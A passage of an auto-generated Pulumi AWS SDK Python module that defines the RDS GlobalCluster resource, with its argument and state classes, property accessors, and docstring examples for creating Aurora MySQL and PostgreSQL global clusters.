    def engine_version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "engine_version", value)

    @property
    @pulumi.getter(name="forceDestroy")
    def force_destroy(self) -> Optional[pulumi.Input[bool]]:
        """
        Enable to remove DB Cluster members from Global Cluster on destroy. Required with `source_db_cluster_identifier`.
        """
        return pulumi.get(self, "force_destroy")

    @force_destroy.setter
    def force_destroy(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "force_destroy", value)

    @property
    @pulumi.getter(name="sourceDbClusterIdentifier")
    def source_db_cluster_identifier(self) -> Optional[pulumi.Input[str]]:
        """
        Amazon Resource Name (ARN) to use as the primary DB Cluster of the Global Cluster on creation. The provider cannot perform drift detection of this value.
        """
        return pulumi.get(self, "source_db_cluster_identifier")

    @source_db_cluster_identifier.setter
    def source_db_cluster_identifier(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "source_db_cluster_identifier", value)

    @property
    @pulumi.getter(name="storageEncrypted")
    def storage_encrypted(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies whether the DB cluster is encrypted. The default is `false` unless `source_db_cluster_identifier` is specified and encrypted. The provider will only perform drift detection if a configuration value is provided.
        """
        return pulumi.get(self, "storage_encrypted")

    @storage_encrypted.setter
    def storage_encrypted(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "storage_encrypted", value)
@pulumi.input_type
class _GlobalClusterState:
    """State container for looking up and filtering GlobalCluster resources.

    Unlike the creation-time args class, this also carries the output-only
    attributes (`arn`, `global_cluster_members`, `global_cluster_resource_id`)
    so an existing resource's full state can be described.
    """

    def __init__(__self__, *,
                 arn: Optional[pulumi.Input[str]] = None,
                 database_name: Optional[pulumi.Input[str]] = None,
                 deletion_protection: Optional[pulumi.Input[bool]] = None,
                 engine: Optional[pulumi.Input[str]] = None,
                 engine_version: Optional[pulumi.Input[str]] = None,
                 force_destroy: Optional[pulumi.Input[bool]] = None,
                 global_cluster_identifier: Optional[pulumi.Input[str]] = None,
                 global_cluster_members: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalClusterGlobalClusterMemberArgs']]]] = None,
                 global_cluster_resource_id: Optional[pulumi.Input[str]] = None,
                 source_db_cluster_identifier: Optional[pulumi.Input[str]] = None,
                 storage_encrypted: Optional[pulumi.Input[bool]] = None):
        """
        Input properties used for looking up and filtering GlobalCluster resources.
        :param pulumi.Input[str] arn: RDS Global Cluster Amazon Resource Name (ARN)
        :param pulumi.Input[str] database_name: Name for an automatically created database on cluster creation.
        :param pulumi.Input[bool] deletion_protection: If the Global Cluster should have deletion protection enabled. The database can't be deleted when this value is set to `true`. The default is `false`.
        :param pulumi.Input[str] engine: Name of the database engine to be used for this DB cluster. The provider will only perform drift detection if a configuration value is provided. Valid values: `aurora`, `aurora-mysql`, `aurora-postgresql`. Defaults to `aurora`. Conflicts with `source_db_cluster_identifier`.
        :param pulumi.Input[str] engine_version: Engine version of the Aurora global database.
               * **NOTE:** When the engine is set to `aurora-mysql`, an engine version compatible with global database is required. The earliest available version is `5.7.mysql_aurora.2.06.0`.
        :param pulumi.Input[bool] force_destroy: Enable to remove DB Cluster members from Global Cluster on destroy. Required with `source_db_cluster_identifier`.
        :param pulumi.Input[str] global_cluster_identifier: The global cluster identifier.
        :param pulumi.Input[Sequence[pulumi.Input['GlobalClusterGlobalClusterMemberArgs']]] global_cluster_members: Set of objects containing Global Cluster members.
        :param pulumi.Input[str] global_cluster_resource_id: AWS Region-unique, immutable identifier for the global database cluster. This identifier is found in AWS CloudTrail log entries whenever the AWS KMS key for the DB cluster is accessed
        :param pulumi.Input[str] source_db_cluster_identifier: Amazon Resource Name (ARN) to use as the primary DB Cluster of the Global Cluster on creation. The provider cannot perform drift detection of this value.
        :param pulumi.Input[bool] storage_encrypted: Specifies whether the DB cluster is encrypted. The default is `false` unless `source_db_cluster_identifier` is specified and encrypted. The provider will only perform drift detection if a configuration value is provided.
        """
        # Record only the arguments that were actually supplied; leaving the
        # rest unset lets the engine distinguish "omitted" from an explicit value.
        if arn is not None:
            pulumi.set(__self__, "arn", arn)
        if database_name is not None:
            pulumi.set(__self__, "database_name", database_name)
        if deletion_protection is not None:
            pulumi.set(__self__, "deletion_protection", deletion_protection)
        if engine is not None:
            pulumi.set(__self__, "engine", engine)
        if engine_version is not None:
            pulumi.set(__self__, "engine_version", engine_version)
        if force_destroy is not None:
            pulumi.set(__self__, "force_destroy", force_destroy)
        if global_cluster_identifier is not None:
            pulumi.set(__self__, "global_cluster_identifier", global_cluster_identifier)
        if global_cluster_members is not None:
            pulumi.set(__self__, "global_cluster_members", global_cluster_members)
        if global_cluster_resource_id is not None:
            pulumi.set(__self__, "global_cluster_resource_id", global_cluster_resource_id)
        if source_db_cluster_identifier is not None:
            pulumi.set(__self__, "source_db_cluster_identifier", source_db_cluster_identifier)
        if storage_encrypted is not None:
            pulumi.set(__self__, "storage_encrypted", storage_encrypted)

    @property
    @pulumi.getter
    def arn(self) -> Optional[pulumi.Input[str]]:
        """
        RDS Global Cluster Amazon Resource Name (ARN)
        """
        return pulumi.get(self, "arn")

    @arn.setter
    def arn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "arn", value)

    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> Optional[pulumi.Input[str]]:
        """
        Name for an automatically created database on cluster creation.
        """
        return pulumi.get(self, "database_name")

    @database_name.setter
    def database_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "database_name", value)

    @property
    @pulumi.getter(name="deletionProtection")
    def deletion_protection(self) -> Optional[pulumi.Input[bool]]:
        """
        If the Global Cluster should have deletion protection enabled. The database can't be deleted when this value is set to `true`. The default is `false`.
        """
        return pulumi.get(self, "deletion_protection")

    @deletion_protection.setter
    def deletion_protection(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "deletion_protection", value)

    @property
    @pulumi.getter
    def engine(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the database engine to be used for this DB cluster. The provider will only perform drift detection if a configuration value is provided. Valid values: `aurora`, `aurora-mysql`, `aurora-postgresql`. Defaults to `aurora`. Conflicts with `source_db_cluster_identifier`.
        """
        return pulumi.get(self, "engine")

    @engine.setter
    def engine(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "engine", value)

    @property
    @pulumi.getter(name="engineVersion")
    def engine_version(self) -> Optional[pulumi.Input[str]]:
        """
        Engine version of the Aurora global database.
        * **NOTE:** When the engine is set to `aurora-mysql`, an engine version compatible with global database is required. The earliest available version is `5.7.mysql_aurora.2.06.0`.
        """
        return pulumi.get(self, "engine_version")

    @engine_version.setter
    def engine_version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "engine_version", value)

    @property
    @pulumi.getter(name="forceDestroy")
    def force_destroy(self) -> Optional[pulumi.Input[bool]]:
        """
        Enable to remove DB Cluster members from Global Cluster on destroy. Required with `source_db_cluster_identifier`.
        """
        return pulumi.get(self, "force_destroy")

    @force_destroy.setter
    def force_destroy(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "force_destroy", value)

    @property
    @pulumi.getter(name="globalClusterIdentifier")
    def global_cluster_identifier(self) -> Optional[pulumi.Input[str]]:
        """
        The global cluster identifier.
        """
        return pulumi.get(self, "global_cluster_identifier")

    @global_cluster_identifier.setter
    def global_cluster_identifier(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "global_cluster_identifier", value)

    @property
    @pulumi.getter(name="globalClusterMembers")
    def global_cluster_members(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalClusterGlobalClusterMemberArgs']]]]:
        """
        Set of objects containing Global Cluster members.
        """
        return pulumi.get(self, "global_cluster_members")

    @global_cluster_members.setter
    def global_cluster_members(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalClusterGlobalClusterMemberArgs']]]]):
        pulumi.set(self, "global_cluster_members", value)

    @property
    @pulumi.getter(name="globalClusterResourceId")
    def global_cluster_resource_id(self) -> Optional[pulumi.Input[str]]:
        """
        AWS Region-unique, immutable identifier for the global database cluster. This identifier is found in AWS CloudTrail log entries whenever the AWS KMS key for the DB cluster is accessed
        """
        return pulumi.get(self, "global_cluster_resource_id")

    @global_cluster_resource_id.setter
    def global_cluster_resource_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "global_cluster_resource_id", value)

    @property
    @pulumi.getter(name="sourceDbClusterIdentifier")
    def source_db_cluster_identifier(self) -> Optional[pulumi.Input[str]]:
        """
        Amazon Resource Name (ARN) to use as the primary DB Cluster of the Global Cluster on creation. The provider cannot perform drift detection of this value.
        """
        return pulumi.get(self, "source_db_cluster_identifier")

    @source_db_cluster_identifier.setter
    def source_db_cluster_identifier(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "source_db_cluster_identifier", value)

    @property
    @pulumi.getter(name="storageEncrypted")
    def storage_encrypted(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies whether the DB cluster is encrypted. The default is `false` unless `source_db_cluster_identifier` is specified and encrypted. The provider will only perform drift detection if a configuration value is provided.
        """
        return pulumi.get(self, "storage_encrypted")

    @storage_encrypted.setter
    def storage_encrypted(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "storage_encrypted", value)
class GlobalCluster(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 database_name: Optional[pulumi.Input[str]] = None,
                 deletion_protection: Optional[pulumi.Input[bool]] = None,
                 engine: Optional[pulumi.Input[str]] = None,
                 engine_version: Optional[pulumi.Input[str]] = None,
                 force_destroy: Optional[pulumi.Input[bool]] = None,
                 global_cluster_identifier: Optional[pulumi.Input[str]] = None,
                 source_db_cluster_identifier: Optional[pulumi.Input[str]] = None,
                 storage_encrypted: Optional[pulumi.Input[bool]] = None,
                 __props__=None):
        """
        Manages an RDS Global Cluster, which is an Aurora global database spread across multiple regions. The global database contains a single primary cluster with read-write capability, and a read-only secondary cluster that receives data from the primary cluster through high-speed replication performed by the Aurora storage subsystem.

        More information about Aurora global databases can be found in the [Aurora User Guide](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/aurora-global-database.html#aurora-global-database-creating).

        ## Example Usage
        ### New MySQL Global Cluster

        ```python
        import pulumi
        import pulumi_aws as aws

        example = aws.rds.GlobalCluster("example",
            global_cluster_identifier="global-test",
            engine="aurora",
            engine_version="5.6.mysql_aurora.1.22.2",
            database_name="example_db")
        primary_cluster = aws.rds.Cluster("primaryCluster",
            engine=example.engine,
            engine_version=example.engine_version,
            cluster_identifier="test-primary-cluster",
            master_username="username",
            master_password="somepass123",
            database_name="example_db",
            global_cluster_identifier=example.id,
            db_subnet_group_name="default",
            opts=pulumi.ResourceOptions(provider=aws["primary"]))
        primary_cluster_instance = aws.rds.ClusterInstance("primaryClusterInstance",
            engine=example.engine,
            engine_version=example.engine_version,
            identifier="test-primary-cluster-instance",
            cluster_identifier=primary_cluster.id,
            instance_class="db.r4.large",
            db_subnet_group_name="default",
            opts=pulumi.ResourceOptions(provider=aws["primary"]))
        secondary_cluster = aws.rds.Cluster("secondaryCluster",
            engine=example.engine,
            engine_version=example.engine_version,
            cluster_identifier="test-secondary-cluster",
            global_cluster_identifier=example.id,
            db_subnet_group_name="default",
            opts=pulumi.ResourceOptions(provider=aws["secondary"]))
        secondary_cluster_instance = aws.rds.ClusterInstance("secondaryClusterInstance",
            engine=example.engine,
            engine_version=example.engine_version,
            identifier="test-secondary-cluster-instance",
            cluster_identifier=secondary_cluster.id,
            instance_class="db.r4.large",
            db_subnet_group_name="default",
            opts=pulumi.ResourceOptions(provider=aws["secondary"],
                depends_on=[primary_cluster_instance]))
        ```
        ### New PostgreSQL Global Cluster

        ```python
        import pulumi
        import pulumi_aws as aws
        import pulumi_pulumi as pulumi

        primary = pulumi.providers.Aws("primary", region="us-east-2")
        secondary = pulumi.providers.Aws("secondary", region="us-east-1")
        example = aws.rds.GlobalCluster("example",
            global_cluster_identifier="global-test",
            engine="aurora-postgresql",
            engine_version="11.9",
            database_name="example_db")
        primary_cluster = aws.rds.Cluster("primaryCluster",
            engine=example.engine,
            engine_version=example.engine_version,
            cluster_identifier="test-primary-cluster",
            master_username="username",
            master_password="somepass123",
            database_name="example_db",
            global_cluster_identifier=example.id,
            db_subnet_group_name="default",
            opts=pulumi.ResourceOptions(provider=aws["primary"]))
        primary_cluster_instance = aws.rds.ClusterInstance("primaryClusterInstance",
            engine=example.engine,
            engine_version=example.engine_version,
            identifier="test-primary-cluster-instance",
            cluster_identifier=primary_cluster.id,
            instance_class="db.r4.large",
            db_subnet_group_name="default",
            opts=pulumi.ResourceOptions(provider=aws["primary"]))
        secondary_cluster = aws.rds.Cluster("secondaryCluster",
            engine=example.engine,
            engine_version=example.engine_version,
            cluster_identifier="test-secondary-cluster",
            global_cluster_identifier=example.id,
            skip_final_snapshot=True,
            db_subnet_group_name="default",
            opts=pulumi.ResourceOptions(provider=aws["secondary"],
                depends_on=[primary_cluster_instance]))
        secondary_cluster_instance = aws.rds.ClusterInstance("secondaryClusterInstance",
            engine=example.engine,
            engine_version=example.engine_version,
            identifier="test-secondary-cluster-instance",
            cluster_identifier=secondary_cluster.id,
            instance_class="db.r4.large",
            db_subnet_group_name="default",
            opts=pulumi.ResourceOptions(provider=aws["secondary"]))
        ```
        ### New Global Cluster From Existing DB Cluster

        ```python
        import pulumi
        import pulumi_aws as aws

        # ... other configuration ...
        example_cluster = aws.rds.Cluster("exampleCluster")
        example_global_cluster = aws.rds.GlobalCluster("exampleGlobalCluster",
            force_destroy=True,
            global_cluster_identifier="example",
            source_db_cluster_identifier=example_cluster.arn)
        ```

        ## Import

        `aws_rds_global_cluster` can be imported by using the RDS Global Cluster identifier, e.g.,

        ```sh
         $ pulumi import aws:rds/globalCluster:GlobalCluster example example
        ```

         Certain resource arguments, like `force_destroy`, only exist within this provider. If the argument is set in the provider configuration on an imported resource, This provider will show a difference on the first plan after import to update the state value. This change is safe to apply immediately so the state matches the desired configuration. Certain resource arguments, like `source_db_cluster_identifier`, do not have an API method for reading the information after creation. If the argument is set in the provider configuration on an imported resource, the provider will always show a difference. To workaround this behavior, either omit the argument from the provider configuration or use `ignore_changes` to hide the difference, e.g. terraform resource "aws_rds_global_cluster" "example" {

        # ... other configuration ...

        # There is no API for reading source_db_cluster_identifier

        lifecycle {

        ignore_changes = [source_db_cluster_identifier]

        } }

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] database_name: Name for an automatically created database on cluster creation.
        :param pulumi.Input[bool] deletion_protection: If the Global Cluster should have deletion protection enabled. The database can't be deleted when this value is set to `true`. The default is `false`.
        :param pulumi.Input[str] engine: Name of the database engine to be used for this DB cluster. The provider will only perform drift detection if a configuration value is provided. Valid values: `aurora`, `aurora-mysql`, `aurora-postgresql`. Defaults to `aurora`. Conflicts with `source_db_cluster_identifier`.
        :param pulumi.Input[str] engine_version: Engine version of the Aurora global database.
               * **NOTE:** When the engine is set to `aurora-mysql`, an engine version compatible with global database is required. The earliest available version is `5.7.mysql_aurora.2.06.0`.
        :param pulumi.Input[bool] force_destroy: Enable to remove DB Cluster members from Global Cluster on destroy. Required with `source_db_cluster_identifier`.
        :param pulumi.Input[str] global_cluster_identifier: The global cluster identifier.
        :param pulumi.Input[str] source_db_cluster_identifier: Amazon Resource Name (ARN) to use as the primary DB Cluster of the Global Cluster on creation. The provider cannot perform drift detection of this value.
        :param pulumi.Input[bool] storage_encrypted: Specifies whether the DB cluster is encrypted. The default is `false` unless `source_db_cluster_identifier` is specified and encrypted. The provider will only perform drift detection if a configuration value is provided.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: GlobalClusterArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages an RDS Global Cluster, which is an Aurora global database spread across multiple regions. The global database contains a single primary cluster with read-write capability, and a read-only secondary cluster that receives data from the primary cluster through high-speed replication performed by the Aurora storage subsystem.

        More information about Aurora global databases can be found in the [Aurora User Guide](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/aurora-global-database.html#aurora-global-database-creating).

        ## Example Usage
        ### New MySQL Global Cluster

        ```python
        import pulumi
        import pulumi_aws as aws

        example = aws.rds.GlobalCluster("example",
            global_cluster_identifier="global-test",
            engine="aurora",
            engine_version="5.6.mysql_aurora.1.22.2",
            database_name="example_db")
        primary_cluster = aws.rds.Cluster("primaryCluster",
            engine=example.engine,
            engine_version=example.engine_version,
            cluster_identifier="test-primary-cluster",
            master_username="username",
            master_password="somepass123",
            database_name="example_db",
            global_cluster_identifier=example.id,
            db_subnet_group_name="default",
            opts=pulumi.ResourceOptions(provider=aws["primary"]))
        primary_cluster_instance = aws.rds.ClusterInstance("primaryClusterInstance",
            engine=example.engine,
            engine_version=example.engine_version,
            identifier="test-primary-cluster-instance",
            cluster_identifier=primary_cluster.id,
            instance_class="db.r4.large",
            db_subnet_group_name="default",
            opts=pulumi.ResourceOptions(provider=aws["primary"]))
        secondary_cluster = aws.rds.Cluster("secondaryCluster",
            engine=example.engine,
            engine_version=example.engine_version,
            cluster_identifier="test-secondary-cluster",
            global_cluster_identifier=example.id,
            db_subnet_group_name="default",
            opts=pulumi.ResourceOptions(provider=aws["secondary"]))
        secondary_cluster_instance = aws.rds.ClusterInstance("secondaryClusterInstance",
            engine=example.engine,
            engine_version=example.engine_version,
            identifier="test-secondary-cluster-instance",
            cluster_identifier=secondary_cluster.id,
            instance_class="db.r4.large",
            db_subnet_group_name="default",
            opts=pulumi.ResourceOptions(provider=aws["secondary"],
                depends_on=[primary_cluster_instance]))
        ```
        ### New PostgreSQL Global Cluster

        ```python
        import pulumi
        import pulumi_aws as aws
        import pulumi_pulumi as pulumi

        primary = pulumi.providers.Aws("primary", region="us-east-2")
        secondary = pulumi.providers.Aws("secondary", region="us-east-1")
        example = aws.rds.GlobalCluster("example",
            global_cluster_identifier="global-test",
            engine="aurora-postgresql",
            engine_version="11.9",
            database_name="example_db")
        primary_cluster = aws.rds.Cluster("primaryCluster",
            engine=example.engine,
            engine_version=example.engine_version,
            cluster_identifier="test-primary-cluster",
            master_username="username",
            master_password="somepass123",
            database_name="example_db",
            global_cluster_identifier=example.id,
            db_subnet_group_name="default",
            opts=pulumi.ResourceOptions(provider=aws["primary"]))
        primary_cluster_instance = aws.rds.ClusterInstance("primaryClusterInstance",
            engine=example.engine,
            engine_version=example.engine_version,
            identifier="test-primary-cluster-instance",
            cluster_identifier=primary_cluster.id,
            instance_class="db.r4.large",
            db_subnet_group_name="default",
            opts=pulumi.ResourceOptions(provider=aws["primary"]))
        secondary_cluster = aws.rds.Cluster("secondaryCluster",
            engine=example.engine,
            engine_version=example.engine_version,
            cluster_identifier="test-secondary-cluster",
            global_cluster_identifier=example.id,
            skip_final_snapshot=True,
            db_subnet_group_name="default",
            opts=pulumi.ResourceOptions(provider=aws["secondary"],
                depends_on=[primary_cluster_instance]))
        secondary_cluster_instance = aws.rds.ClusterInstance("secondaryClusterInstance",
            engine=example.engine,
            engine_version=example.engine_version,
            identifier="test-secondary-cluster-instance",
            cluster_identifier=secondary_cluster.id,
            instance_class="db.r4.large",
            db_subnet_group_name="default",
            opts=pulumi.ResourceOptions(provider=aws["secondary"]))
        ```
        ### New Global Cluster From Existing DB Cluster

        ```python
        import pulumi
        import pulumi_aws as aws

        # ... other configuration ...
        example_cluster = aws.rds.Cluster("exampleCluster")
        example_global_cluster = aws.rds.GlobalCluster("exampleGlobalCluster",
            force_destroy=True,
            global_cluster_identifier="example",
            source_db_cluster_identifier=example_cluster.arn)
        ```

        ## Import

        `aws_rds_global_cluster` can be imported by using the RDS Global Cluster identifier, e.g.,

        ```sh
         $ pulumi import aws:rds/globalCluster:GlobalCluster example example
        ```

         Certain resource arguments, like `force_destroy`, only exist within this provider. If the argument is set in the provider configuration on an imported resource, This provider will show a difference on the first plan after import to update the state value. This change is safe to apply immediately so the state matches the desired configuration. Certain resource arguments, like `source_db_cluster_identifier`, do not have an API method for reading the information after creation. If the argument is set in the provider configuration on an imported resource, the provider will always show a difference. To workaround this behavior, either omit the argument from the provider configuration or use `ignore_changes` to hide the difference, e.g. terraform resource "aws_rds_global_cluster" "example" {

        # ... other configuration ...

        # There is no API for reading source_db_cluster_identifier

        lifecycle {

        ignore_changes = [source_db_cluster_identifier]

        } }

        :param str resource_name: The name of the resource.
        :param GlobalClusterArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Runtime dispatcher for the two overloads above: when the caller
        # passed a bundled GlobalClusterArgs object, unpack it into keyword
        # arguments; otherwise forward the call as-is.
        resource_args, opts = _utilities.get_resource_args_opts(GlobalClusterArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 database_name: Optional[pulumi.Input[str]] = None,
                 deletion_protection: Optional[pulumi.Input[bool]] = None,
                 engine: Optional[pulumi.Input[str]] = None,
                 engine_version: Optional[pulumi.Input[str]] = None,
                 force_destroy: Optional[pulumi.Input[bool]] = None,
                 global_cluster_identifier: Optional[pulumi.Input[str]] = None,
                 source_db_cluster_identifier: Optional[pulumi.Input[str]] = None,
                 storage_encrypted: Optional[pulumi.Input[bool]] = None,
                 __props__=None):
        # Shared implementation behind both __init__ overloads.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: build the property bag from the
            # individual arguments.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = GlobalClusterArgs.__new__(GlobalClusterArgs)
            __props__.__dict__["database_name"] = database_name
            __props__.__dict__["deletion_protection"] = deletion_protection
            __props__.__dict__["engine"] = engine
            __props__.__dict__["engine_version"] = engine_version
            __props__.__dict__["force_destroy"] = force_destroy
            # global_cluster_identifier is required unless the engine is
            # rehydrating the resource from an existing URN.
            if global_cluster_identifier is None and not opts.urn:
                raise TypeError("Missing required property 'global_cluster_identifier'")
            __props__.__dict__["global_cluster_identifier"] = global_cluster_identifier
            __props__.__dict__["source_db_cluster_identifier"] = source_db_cluster_identifier
            __props__.__dict__["storage_encrypted"] = storage_encrypted
            # Output-only properties start as None and are populated by the
            # provider after creation.
            __props__.__dict__["arn"] = None
            __props__.__dict__["global_cluster_members"] = None
            __props__.__dict__["global_cluster_resource_id"] = None
        super(GlobalCluster, __self__).__init__(
            'aws:rds/globalCluster:GlobalCluster',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            arn: Optional[pulumi.Input[str]] = None,
            database_name: Optional[pulumi.Input[str]] = None,
            deletion_protection: Optional[pulumi.Input[bool]] = None,
            engine: Optional[pulumi.Input[str]] = None,
            engine_version: Optional[pulumi.Input[str]] = None,
            force_destroy: Optional[pulumi.Input[bool]] = None,
            global_cluster_identifier: Optional[pulumi.Input[str]] = None,
            global_cluster_members: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['GlobalClusterGlobalClusterMemberArgs']]]]] = None,
            global_cluster_resource_id: Optional[pulumi.Input[str]] = None,
            source_db_cluster_identifier: Optional[pulumi.Input[str]] = None,
            storage_encrypted: Optional[pulumi.Input[bool]] = None) -> 'GlobalCluster':
        """
        Get an existing GlobalCluster resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] arn: RDS Global Cluster Amazon Resource Name (ARN)
        :param pulumi.Input[str] database_name: Name for an automatically created database on cluster creation.
        :param pulumi.Input[bool] deletion_protection: If the Global Cluster should have deletion protection enabled. The database can't be deleted when this value is set to `true`. The default is `false`.
        :param pulumi.Input[str] engine: Name of the database engine to be used for this DB cluster. The provider will only perform drift detection if a configuration value is provided. Valid values: `aurora`, `aurora-mysql`, `aurora-postgresql`. Defaults to `aurora`. Conflicts with `source_db_cluster_identifier`.
        :param pulumi.Input[str] engine_version: Engine version of the Aurora global database.
               * **NOTE:** When the engine is set to `aurora-mysql`, an engine version compatible with global database is required. The earliest available version is `5.7.mysql_aurora.2.06.0`.
        :param pulumi.Input[bool] force_destroy: Enable to remove DB Cluster members from Global Cluster on destroy. Required with `source_db_cluster_identifier`.
        :param pulumi.Input[str] global_cluster_identifier: The global cluster identifier.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['GlobalClusterGlobalClusterMemberArgs']]]] global_cluster_members: Set of objects containing Global Cluster members.
        :param pulumi.Input[str] global_cluster_resource_id: AWS Region-unique, immutable identifier for the global database cluster. This identifier is found in AWS CloudTrail log entries whenever the AWS KMS key for the DB cluster is accessed
        :param pulumi.Input[str] source_db_cluster_identifier: Amazon Resource Name (ARN) to use as the primary DB Cluster of the Global Cluster on creation. The provider cannot perform drift detection of this value.
        :param pulumi.Input[bool] storage_encrypted: Specifies whether the DB cluster is encrypted. The default is `false` unless `source_db_cluster_identifier` is specified and encrypted. The provider will only perform drift detection if a configuration value is provided.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _GlobalClusterState.__new__(_GlobalClusterState)

        __props__.__dict__["arn"] = arn
        __props__.__dict__["database_name"] = database_name
        __props__.__dict__["deletion_protection"] = deletion_protection
        __props__.__dict__["engine"] = engine
        __props__.__dict__["engine_version"] = engine_version
        __props__.__dict__["force_destroy"] = force_destroy
        __props__.__dict__["global_cluster_identifier"] = global_cluster_identifier
        __props__.__dict__["global_cluster_members"] = global_cluster_members
        __props__.__dict__["global_cluster_resource_id"] = global_cluster_resource_id
        __props__.__dict__["source_db_cluster_identifier"] = source_db_cluster_identifier
        __props__.__dict__["storage_encrypted"] = storage_encrypted
        return GlobalCluster(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter
    def arn(self) -> pulumi.Output[str]:
        """
        RDS Global Cluster Amazon Resource Name (ARN)
        """
        return pulumi.get(self, "arn")

    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Output[Optional[str]]:
        """
        Name for an automatically created database on cluster creation.
        """
        return pulumi.get(self, "database_name")

    @property
    @pulumi.getter(name="deletionProtection")
    def deletion_protection(self) -> pulumi.Output[Optional[bool]]:
        """
        If the Global Cluster should have deletion protection enabled. The database can't be deleted when this value is set to `true`. The default is `false`.
        """
        return pulumi.get(self, "deletion_protection")

    @property
    @pulumi.getter
    def engine(self) -> pulumi.Output[str]:
        """
        Name of the database engine to be used for this DB cluster. The provider will only perform drift detection if a configuration value is provided. Valid values: `aurora`, `aurora-mysql`, `aurora-postgresql`. Defaults to `aurora`. Conflicts with `source_db_cluster_identifier`.
        """
        return pulumi.get(self, "engine")

    @property
    @pulumi.getter(name="engineVersion")
    def engine_version(self) -> pulumi.Output[str]:
        """
        Engine version of the Aurora global database.
        * **NOTE:** When the engine is set to `aurora-mysql`, an engine version compatible with global database is required. The earliest available version is `5.7.mysql_aurora.2.06.0`.
        """
        return pulumi.get(self, "engine_version")

    @property
    @pulumi.getter(name="forceDestroy")
    def force_destroy(self) -> pulumi.Output[Optional[bool]]:
        """
        Enable to remove DB Cluster members from Global Cluster on destroy. Required with `source_db_cluster_identifier`.
        """
        return pulumi.get(self, "force_destroy")

    @property
    @pulumi.getter(name="globalClusterIdentifier")
    def global_cluster_identifier(self) -> pulumi.Output[str]:
        """
        The global cluster identifier.
        """
        return pulumi.get(self, "global_cluster_identifier")

    @property
    @pulumi.getter(name="globalClusterMembers")
    def global_cluster_members(self) -> pulumi.Output[Sequence['outputs.GlobalClusterGlobalClusterMember']]:
        """
        Set of objects containing Global Cluster members.
        """
        return pulumi.get(self, "global_cluster_members")

    @property
    @pulumi.getter(name="globalClusterResourceId")
    def global_cluster_resource_id(self) -> pulumi.Output[str]:
        """
        AWS Region-unique, immutable identifier for the global database cluster. This identifier is found in AWS CloudTrail log entries whenever the AWS KMS key for the DB cluster is accessed
        """
        return pulumi.get(self, "global_cluster_resource_id")

    @property
    @pulumi.getter(name="sourceDbClusterIdentifier")
    def source_db_cluster_identifier(self) -> pulumi.Output[str]:
        """
        Amazon Resource Name (ARN) to use as the primary DB Cluster of the Global Cluster on creation. The provider cannot perform drift detection of this value.
        """
        return pulumi.get(self, "source_db_cluster_identifier")

    @property
    @pulumi.getter(name="storageEncrypted")
    def storage_encrypted(self) -> pulumi.Output[bool]:
        """
        Specifies whether the DB cluster is encrypted. The default is `false` unless `source_db_cluster_identifier` is specified and encrypted. The provider will only perform drift detection if a configuration value is provided.
        """
        return pulumi.get(self, "storage_encrypted")
| 54.390681
| 813
| 0.689226
| 5,330
| 45,525
| 5.673921
| 0.058724
| 0.048013
| 0.050889
| 0.0496
| 0.935123
| 0.924773
| 0.915515
| 0.904669
| 0.898486
| 0.883077
| 0
| 0.002399
| 0.22179
| 45,525
| 836
| 814
| 54.455742
| 0.851219
| 0.532389
| 0
| 0.746356
| 1
| 0
| 0.133912
| 0.066022
| 0
| 0
| 0
| 0
| 0
| 1
| 0.163265
| false
| 0.002915
| 0.020408
| 0
| 0.282799
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
